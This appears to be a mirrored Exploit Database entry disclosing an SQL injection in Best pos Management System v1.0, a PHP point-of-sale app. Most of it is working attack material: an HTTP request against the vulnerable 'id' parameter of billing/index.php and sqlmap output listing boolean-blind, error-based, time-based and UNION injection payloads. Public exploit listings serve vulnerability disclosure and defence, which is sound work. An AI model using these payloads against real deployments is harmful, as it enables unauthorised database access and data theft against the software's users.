Best pos Management System v1.0 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Ahmed Ismail
  日期： 2023-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51279/

• # Exploit Title: Best pos Management System v1.0 - SQL Injection
  # Google Dork: NA
  # Date: 14/2/2023
  # Exploit Author: Ahmed Ismail (@MrOz1l)
  # Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
  # Version: 1.0 
  # Tested on: Windows 11
  # CVE : NA
  
  ```
  GET /kruxton/billing/index.php?id=9 HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: close
  Referer: http://localhost/kruxton/index.php?page=orders
  Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  ```
  
  # Payload
  GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
  ---
  Parameter: id (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=9 AND 4017=4017
  
  Type: error-based
  Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  Payload: id=9 OR (SELECT 7313 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)
  
  Type: UNION query
  Title: Generic UNION query (NULL) - 6 columns
  Payload: id=-9498 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL-- -
  ---
  [19:33:33] [INFO] the back-end DBMS is MySQL
  web application technology: PHP 8.0.25, Apache 2.4.54
  back-end DBMS: MySQL >= 5.0 (MariaDB fork)
  ```